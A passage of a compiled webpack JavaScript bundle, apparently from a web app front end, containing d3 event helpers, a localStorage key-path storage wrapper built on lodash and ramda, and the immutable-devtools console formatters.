/* eslint-disable quotes,flowtype/require-valid-file-annotation,indent,no-var,no-unused-expressions,curly */
/* harmony default export */ __webpack_exports__["a"] = (function (target, type, selection) {
  this.target = target;
  this.type = type;
  this.selection = selection;
});

/***/ }),
/* 4080 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["b"] = nopropagation;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_d3_selection__ = __webpack_require__(69);
/* eslint-disable quotes,flowtype/require-valid-file-annotation,indent,no-var,no-unused-expressions,curly */


function nopropagation() {
  __WEBPACK_IMPORTED_MODULE_0_d3_selection__["event"].stopImmediatePropagation();
}

/* harmony default export */ __webpack_exports__["a"] = (function () {
  __WEBPACK_IMPORTED_MODULE_0_d3_selection__["event"].preventDefault();
  __WEBPACK_IMPORTED_MODULE_0_d3_selection__["event"].stopImmediatePropagation();
});

/***/ }),
/* 4081 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "has", function() { return has; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hasIn", function() { return hasIn; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "get", function() { return get; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getIn", function() { return getIn; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "set", function() { return set; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setIn", function() { return setIn; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "remove", function() { return remove; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "removeIn", function() { return removeIn; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "mergeDeep", function() { return mergeDeep; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "mergeDeepIn", function() { return mergeDeepIn; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_lodash_merge__ = __webpack_require__(1610);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_lodash_merge___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_lodash_merge__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda_src_path__ = __webpack_require__(231);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda_src_path___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda_src_path__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda_src_compose__ = __webpack_require__(265);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda_src_compose___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda_src_compose__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda_src_tap__ = __webpack_require__(1151);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda_src_tap___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda_src_tap__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_debug__);


// NOTE: ramda does not have an equivalent of _.merge, unfortunately









var debug = __WEBPACK_IMPORTED_MODULE_7_debug___default()('lib:storage'); // eslint-disable-line no-unused-vars

var LOCAL_STORAGE_KEY = 'TS_STATION';

var getStorage = function getStorage() {
  try {
    var item = localStorage.getItem(LOCAL_STORAGE_KEY) || '';
    return JSON.parse(item) || {};
  } catch (err) {
    return {};
  }
};

var setValueByArray = function setValueByArray(storage, keypath, value) {
  if (keypath.length === 1) {
    storage[keypath[0]] = value;
    return storage;
  } else {
    var key = keypath.shift();
    if (!storage[key]) storage[key] = {};
    return setValueByArray(storage[key], keypath, value);
  }
};

var removeValueByArray = function removeValueByArray(storage, keypath) {
  if (keypath.length === 1) {
    delete storage[keypath[0]];
    return storage;
  } else {
    var key = keypath.shift();
    if (!storage[key]) storage[key] = {};
    return removeValueByArray(storage[key], keypath);
  }
};

var mergeValueByArray = function mergeValueByArray(storage, keypath, value) {
  if (keypath.length === 1) {
    storage[keypath[0]] = __WEBPACK_IMPORTED_MODULE_1_lodash_merge___default()(storage[keypath[0]], value);
    return storage;
  } else {
    var key = keypath.shift();
    if (!storage[key]) storage[key] = {};
    return mergeValueByArray(storage[key], keypath, value);
  }
};

var has = function has(key) {
  var storage = getStorage();
  return storage && storage.hasOwnProperty(key);
};

var hasIn = function hasIn(keypath) {
  try {
    var storage = getStorage();
    var value = __WEBPACK_IMPORTED_MODULE_2_ramda_src_path___default()(keypath, storage);
    return value !== undefined;
  } catch (err) {
    return false;
  }
};

var get = function get(key) {
  return new Promise(function (resolve, reject) {
    try {
      var storage = getStorage();
      resolve(storage[key]);
    } catch (err) {
      reject(err);
    }
  });
};

// Currently supporting only 2 levels deep; i.e. key='key1.key2'
var getIn = function getIn(keypath) {
  return new Promise(function (resolve, reject) {
    try {
      var storage = getStorage();
      var value = __WEBPACK_IMPORTED_MODULE_2_ramda_src_path___default()(keypath, storage);
      resolve(value);
    } catch (err) {
      reject(err);
    }
  });
};

var set = function set(key, value) {
  return new Promise(function (resolve, reject) {
    try {
      var storage = getStorage();
      storage[key] = value;
      localStorage.setItem(LOCAL_STORAGE_KEY, JSON.stringify(storage));
      resolve(storage);
    } catch (err) {
      reject(err);
    }
  });
};

var setIn = function setIn(keypath, value) {
  return new Promise(function (resolve, reject) {
    try {
      var storage = getStorage();
      setValueByArray(storage, keypath, value);
      localStorage.setItem(LOCAL_STORAGE_KEY, JSON.stringify(storage));
      resolve(storage);
    } catch (err) {
      reject(err);
    }
  });
};

var remove = function remove(key) {
  return new Promise(function (resolve, reject) {
    try {
      var storage = getStorage();
      delete storage[key];
      localStorage.setItem(LOCAL_STORAGE_KEY, JSON.stringify(storage));
      resolve();
    } catch (err) {
      reject(err);
    }
  });
};

// TODO: This promise is entirely uneccessary. The only reason we promise
// everything here is because initially I wanted a way to represent disjunction
// in a more functional way... but I didn't know about monads.
var removeIn = function removeIn(keypath) {
  return new Promise(function (resolve, reject) {

    // TODO: We should use IO for all the logic in this file
    // TODO: Converting back and forth between immutable and a JSON string seems
    // like a great use case for an isomorphism
    // NOTE: we do the map-tap combo simply to do a side effect. Might be worth
    // considering adding a `do` method to IO
    Object(__WEBPACK_IMPORTED_MODULE_6_trustar_fp__["IO"])(function () {
      return localStorage.getItem(LOCAL_STORAGE_KEY);
    }).map(__WEBPACK_IMPORTED_MODULE_3_ramda_src_compose___default()(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"], JSON.parse)).map(function (data) {
      return data.removeIn(keypath);
    }) // Transform back into JS object to stringify
    .map(__WEBPACK_IMPORTED_MODULE_3_ramda_src_compose___default()(JSON.stringify, __WEBPACK_IMPORTED_MODULE_5_trustar_utils_utils_js__["toJS"])).map(__WEBPACK_IMPORTED_MODULE_4_ramda_src_tap___default()(function (str) {
      return localStorage.setItem(LOCAL_STORAGE_KEY, str);
    })) // See NOTE
    .fold(reject, resolve);
  });
};

var mergeDeep = function mergeDeep(key, value) {
  return new Promise(function (resolve, reject) {
    try {
      var storage = getStorage();
      storage[key] = __WEBPACK_IMPORTED_MODULE_1_lodash_merge___default()(storage[key], value);
      localStorage.setItem(LOCAL_STORAGE_KEY, JSON.stringify(storage));
      resolve();
    } catch (err) {
      reject(err);
    }
  });
};

var mergeDeepIn = function mergeDeepIn(keypath, value) {
  return new Promise(function (resolve, reject) {
    try {
      var storage = getStorage();
      mergeValueByArray(storage, keypath, value);
      localStorage.setItem(LOCAL_STORAGE_KEY, JSON.stringify(storage));
      resolve(storage);
    } catch (err) {
      reject(err);
    }
  });
};

/***/ }),
/* 4082 */
/***/ (function(module, exports, __webpack_require__) {

(function webpackUniversalModuleDefinition(root, factory) {
	if(true)
		module.exports = factory();
	else if(typeof define === 'function' && define.amd)
		define([], factory);
	else if(typeof exports === 'object')
		exports["immutableDevTools"] = factory();
	else
		root["immutableDevTools"] = factory();
})(this, function() {
return /******/ (function(modules) { // webpackBootstrap
/******/ 	// The module cache
/******/ 	var installedModules = {};

/******/ 	// The require function
/******/ 	function __webpack_require__(moduleId) {

/******/ 		// Check if module is in cache
/******/ 		if(installedModules[moduleId])
/******/ 			return installedModules[moduleId].exports;

/******/ 		// Create a new module (and put it into the cache)
/******/ 		var module = installedModules[moduleId] = {
/******/ 			exports: {},
/******/ 			id: moduleId,
/******/ 			loaded: false
/******/ 		};

/******/ 		// Execute the module function
/******/ 		modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);

/******/ 		// Flag the module as loaded
/******/ 		module.loaded = true;

/******/ 		// Return the exports of the module
/******/ 		return module.exports;
/******/ 	}


/******/ 	// expose the modules object (__webpack_modules__)
/******/ 	__webpack_require__.m = modules;

/******/ 	// expose the module cache
/******/ 	__webpack_require__.c = installedModules;

/******/ 	// __webpack_public_path__
/******/ 	__webpack_require__.p = "";

/******/ 	// Load entry module and return exports
/******/ 	return __webpack_require__(0);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */
/***/ function(module, exports, __webpack_require__) {

	"use strict";

	Object.defineProperty(exports, "__esModule", {
	  value: true
	});

	var _createFormatters2 = __webpack_require__(1);

	var _createFormatters3 = _interopRequireDefault(_createFormatters2);

	function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }

	// Check for globally defined Immutable and add an install method to it.
	if (typeof Immutable !== "undefined") {
	  Immutable.installDevTools = install.bind(null, Immutable);
	}

	// I imagine most people are using Immutable as a CommonJS module though...

	var installed = false;
	function install(Immutable) {
	  if (typeof window === "undefined") {
	    throw new Error("Can only install immutable-devtools in a browser environment.");
	  }

	  // Don't install more than once.
	  if (installed === true) {
	    return;
	  }

	  window.devtoolsFormatters = window.devtoolsFormatters || [];

	  var _createFormatters = (0, _createFormatters3.default)(Immutable);

	  var RecordFormatter = _createFormatters.RecordFormatter;
	  var OrderedMapFormatter = _createFormatters.OrderedMapFormatter;
	  var OrderedSetFormatter = _createFormatters.OrderedSetFormatter;
	  var ListFormatter = _createFormatters.ListFormatter;
	  var MapFormatter = _createFormatters.MapFormatter;
	  var SetFormatter = _createFormatters.SetFormatter;
	  var StackFormatter = _createFormatters.StackFormatter;

	  window.devtoolsFormatters.push(RecordFormatter, OrderedMapFormatter, OrderedSetFormatter, ListFormatter, MapFormatter, SetFormatter, StackFormatter);

	  installed = true;
	}

	module.exports = install;
	exports.default = install;

/***/ },
/* 1 */
/***/ function(module, exports) {

	'use strict';

	Object.defineProperty(exports, "__esModule", {
	  value: true
	});
	exports.default = createFormatter;

	function _toConsumableArray(arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) { arr2[i] = arr[i]; } return arr2; } else { return Array.from(arr); } }

	var listStyle = { style: 'list-style-type: none; padding: 0; margin: 0 0 0 12px; font-style: normal' };
	var immutableNameStyle = { style: 'color: rgb(232,98,0)' };
	var keyStyle = { style: 'color: #881391' };
	var defaultValueKeyStyle = { style: 'color: #777' };
	var alteredValueKeyStyle = { style: 'color: #881391; font-weight: bolder' };
	var inlineValuesStyle = { style: 'color: #777; font-style: italic' };
	var nullStyle = { style: 'color: #777' };

	function createFormatter(Immutable) {

	  var reference = function reference(object, config) {
	    if (typeof object === 'undefined') return ['span', nullStyle, 'undefined'];else if (object === 'null') return ['span', nullStyle, 'null'];

	    return ['object', { object: object, config: config }];
	  };

	  var renderIterableHeader = function renderIterableHeader(iterable) {
	    var name = arguments.length <= 1 || arguments[1] === undefined ? 'Iterable' : arguments[1];
	    return ['span', ['span', immutableNameStyle, name], ['span', '[' + iterable.size + ']']];
	  };

	  var hasBody = function hasBody(collection, config) {
	    return collection.size > 0 && !(config && config.noPreview);
	  };

	  var renderIterableBody = function renderIterableBody(collection, mapper) {
	    var options = arguments.length <= 2 || arguments[2] === undefined ? {} : arguments[2];

	    if (options.sorted) {
	      collection = collection.sortBy(function (value, key) {
	        return key;
	      });
	    }
	    var children = collection.map(mapper).toList().toJS();
	    return ['ol', listStyle].concat(_toConsumableArray(children));
	  };

	  var RecordFormatter = {
	    header: function header(record, config) {
	      if (!(record instanceof Immutable.Record)) return null;

	      var defaults = record.clear();
	      var changed = !Immutable.is(defaults, record);

	      if (config && config.noPreview) return ['span', changed ? immutableNameStyle : nullStyle, record._name || record.constructor.name || 'Record'];

	      var inlinePreview = undefined;
	      if (!changed) {
	        inlinePreview = ['span', inlineValuesStyle, '{}'];
	      } else {
	        var preview = record.keySeq().reduce(function (preview, key) {
	          if (Immutable.is(defaults.get(key), record.get(key))) return preview;
	          if (preview.length) preview.push(', ');

	          preview.push(['span', {}, ['span', keyStyle, key + ': '], reference(record.get(key), { noPreview: true })]);
	          return preview;
	        }, []);
	        inlinePreview = ['span', inlineValuesStyle, '{'].concat(_toConsumableArray(preview), ['}']);
	      }
	      return ['span', {}, ['span', immutableNameStyle, record._name || record.constructor.name || 'Record'], ' ', inlinePreview];
	    },

	    hasBody: hasBody,
	    body: function body(record) {
	      var defaults = record.clear();
	      var children = record.keySeq().map(function (key) {
	        var style = Immutable.is(defaults.get(key), record.get(key)) ? defaultValueKeyStyle : alteredValueKeyStyle;
	        return ['li', {}, ['span', style, key + ': '], reference(record.get(key))];
	      }).toJS();
	      return ['ol', listStyle].concat(_toConsumableArray(children));
	    }
	  };

	  var ListFormatter = {
	    header: function header(o) {
	      if (!Immutable.List.isList(o)) return null;
	      return renderIterableHeader(o, 'List');
	    },

	    hasBody: hasBody,
	    body: function body(o) {
	      return renderIterableBody(o, function (value, key) {
	        return ['li', ['span', keyStyle, key + ': '], reference(value)];
	      });
	    }
	  };

	  var StackFormatter = {
	    header: function header(o) {
	      if (!Immutable.Stack.isStack(o)) return null;
	      return renderIterableHeader(o, 'Stack');
	    },

	    hasBody: hasBody,
	    body: function body(o) {
	      return renderIterableBody(o, function (value, key) {
	        return ['li', ['span', keyStyle, key + ': '], reference(value)];
	      });
	    }
	  };

	  var MapFormatter = {
	    header: function header(o) {
	      if (!Immutable.Map.isMap(o)) return null;
	      return renderIterableHeader(o, 'Map');
	    },

	    hasBody: hasBody,
	    body: function body(o) {
	      return renderIterableBody(o, function (value, key) {
	        return ['li', {}, '{', reference(key), ' => ', reference(value), '}'];
	      }, { sorted: true });
	    }
	  };

	  var OrderedMapFormatter = {
	    header: function header(o) {
	      if (!Immutable.OrderedMap.isOrderedMap(o)) return null;
	      return renderIterableHeader(o, 'OrderedMap');
	    },

	    hasBody: hasBody,
	    body: function body(o) {
	      return renderIterableBody(o, function (value, key) {
	        return ['li', {}, '{', reference(key), ' => ', reference(value), '}'];
	      });
	    }
	  };

	  var SetFormatter = {
	    header: function header(o) {
	      if (!Immutable.Set.isSet(o)) return null;
	      return renderIterableHeader(o, 'Set');
	    },

	    hasBody: hasBody,
	    body: function body(o) {
	      return renderIterableBody(o, function (value) {
	        return ['li', reference(value)];
	      }, { sorted: true });
	    }
	  };

	  var OrderedSetFormatter = {
	    header: function header(o) {
	      if (!Immutable.OrderedSet.isOrderedSet(o)) return null;
	      return renderIterableHeader(o, 'OrderedSet');
	    },

	    hasBody: hasBody,
	    body: function body(o) {
	      return renderIterableBody(o, function (value) {
	        return ['li', reference(value)];
	      });
	    }
	  };

	  return {
	    RecordFormatter: RecordFormatter,
	    OrderedMapFormatter: OrderedMapFormatter,
	    OrderedSetFormatter: OrderedSetFormatter,
	    ListFormatter: ListFormatter,
	    MapFormatter: MapFormatter,
	    SetFormatter: SetFormatter,
	    StackFormatter: StackFormatter
	  };
	}

/***/ }
/******/ ])
});
;

/***/ })
],[1670]);


// WEBPACK FOOTER //
// app.a393ddfe22fe384c0e4c.js